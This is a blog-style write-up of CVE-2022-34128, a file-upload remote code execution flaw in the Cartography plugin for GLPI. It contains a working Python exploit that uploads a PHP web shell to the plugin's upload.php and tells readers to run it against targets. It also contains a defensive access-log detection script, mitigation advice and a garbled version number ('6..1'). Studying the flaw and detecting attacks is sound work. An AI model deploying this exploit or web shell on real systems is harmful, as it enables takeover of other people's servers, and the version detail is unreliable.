Overview

In this post, we will delve into a recently disclosed security vulnerability, CVE-2022-34128, a remote code execution flaw present in the Cartography plugin before version 6..1 for GLPI. To provide an understanding of the issue, we will discuss the background of GLPI and the Cartography plugin, explain how the vulnerability occurs, and provide code snippets that demonstrate the exploit. We will also link the original references for further detail and knowledge expansion.

GLPI and Cartography Plugin

GLPI, an acronym for Gestionnaire Libre de Parc Informatique, is a popular open-source Information Resource Manager (IRM) application designed to manage and track IT assets and inventory. The software is widely used by system administrators, IT managers, and helpdesk personnel for effective assistance in various IT operations and asset management tasks.

The Cartography (aka positions) plugin is an extension for GLPI that enables users to graphically represent and manage the geographical position of their IT assets and network devices on a virtual map. This provides users with a convenient way to visualize the distribution of their resources on a physical scale.

The Vulnerability: CVE-2022-34128

The vulnerability lies in the Cartography plugin's front/upload.php file. Specifically, this file accepts PHP code sent as POST data in an HTTP request and stores it where the web server will execute it, giving an attacker remote code execution. This level of access gives the attacker control over the target system and puts the entire GLPI implementation at risk.

To exploit this vulnerability, an attacker could craft a malicious HTTP request to front/upload.php containing PHP code within the POST data. The server, upon receiving this request, would execute the PHP code, thereby leading to a remote code execution attack.

Here's a sample exploit code that demonstrates this vulnerability:

#!/usr/bin/env python3

import requests

# front/upload.php of the Cartography (positions) plugin on the target GLPI host
target_url = "http://target-glpi.example.com/plugins/positions/front/upload.php"

# PHP payload: runs the command given in the "cmd" GET parameter
malicious_file = "<?php system($_GET['cmd']); ?>"

# Multipart form field "file" carrying the payload as malicious.php
files = {'file': ('malicious.php', malicious_file, 'application/x-php')}

response = requests.post(target_url, files=files)

if response.status_code == 200:
    print(f"File uploaded: {response.text}")
else:
    print("File upload failed")

Save this Python script as cve-2022-34128_exploit.py and run it against a vulnerable target system.

In the above Python code, we use the requests library to send a multipart POST request to the target system's front/upload.php file. The POST data contains a malicious PHP file with a simple system() call that executes whatever command is supplied in the cmd GET parameter. On successful execution, the response from the server confirms the file's upload.
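From the defender's side, the same request pattern is what to hunt for in web server access logs: a POST to the plugin's front/upload.php followed by a request for a .php file under the plugin directory outside front/. The following detection script is an added example and is not part of the original post; the sample log lines are constructed, and the pics/ directory in which an uploaded file would land is an assumption, not a path confirmed by the advisory.

```python
import re

# Apache/nginx "combined" access-log format (request line and status only).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

PLUGIN_ROOT = "/plugins/positions/"          # plugin path inside any GLPI install prefix
UPLOAD_ENDPOINT = PLUGIN_ROOT + "front/upload.php"

# Constructed sample traffic (not real logs): a benign client uploads and then browses
# the plugin UI; a second client uploads and then requests a .php file with a cmd parameter
# under a hypothetical upload directory (pics/ is an assumption).
SAMPLE_LOG = """\
203.0.113.10 - - [16/Apr/2023:03:20:01 +0000] "POST /plugins/positions/front/upload.php HTTP/1.1" 200 512
203.0.113.10 - - [16/Apr/2023:03:20:02 +0000] "GET /plugins/positions/front/positions.php?id=3 HTTP/1.1" 200 4096
198.51.100.7 - - [16/Apr/2023:03:21:10 +0000] "POST /plugins/positions/front/upload.php HTTP/1.1" 200 512
198.51.100.7 - - [16/Apr/2023:03:21:15 +0000] "GET /plugins/positions/pics/malicious.php?cmd=id HTTP/1.1" 200 87
"""


def parse_line(line):
    """Return the parsed fields of one combined-format log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(lines):
    """Return (ip, request_path) pairs for clients that POSTed to upload.php and later
    requested a .php resource under the plugin directory that is not one of its front/ scripts."""
    uploaders = set()
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path_only = rec["path"].split("?", 1)[0]
        idx = path_only.find(PLUGIN_ROOT)
        if idx < 0:
            continue                                   # not a Cartography plugin request
        rel = path_only[idx + len(PLUGIN_ROOT):]       # path relative to the plugin root
        if rec["method"] == "POST" and path_only.endswith(UPLOAD_ENDPOINT):
            uploaders.add(rec["ip"])                   # remember who used the upload endpoint
        elif (rec["ip"] in uploaders and rel.lower().endswith(".php")
              and not rel.startswith("front/")):
            hits.append((rec["ip"], rec["path"]))      # uploaded-then-executed pattern
    return hits


if __name__ == "__main__":
    for ip, path in find_suspicious(SAMPLE_LOG.splitlines()):
        print(f"suspicious: {ip} -> {path}")
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines; the benign client in the sample is not flagged because its follow-up request stays under front/.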

For more information on this CVE and in-depth analysis, you may refer to the following resources:

- CVE-2022-34128 entry in the National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-34128
- Commit in the Cartography plugin repository that patches the vulnerability: https://github.com/InfotelGLPI/positions/commit/6caafb72a3bcac95831e1958dabd2d4ec493df5

Conclusion

CVE-2022-34128 is a severe security vulnerability that allows remote code execution via the Cartography plugin for GLPI. To mitigate this issue, we highly recommend upgrading the plugin to version 6..1 or later. Ensuring that your systems are up-to-date with the latest security patches and updates is essential to maintaining the security and integrity of your IT assets. In case of any further questions, feel free to refer to the provided links.

Timeline

Published on: 04/16/2023 03:15:00 UTC
Last modified on: 04/25/2023 18:21:00 UTC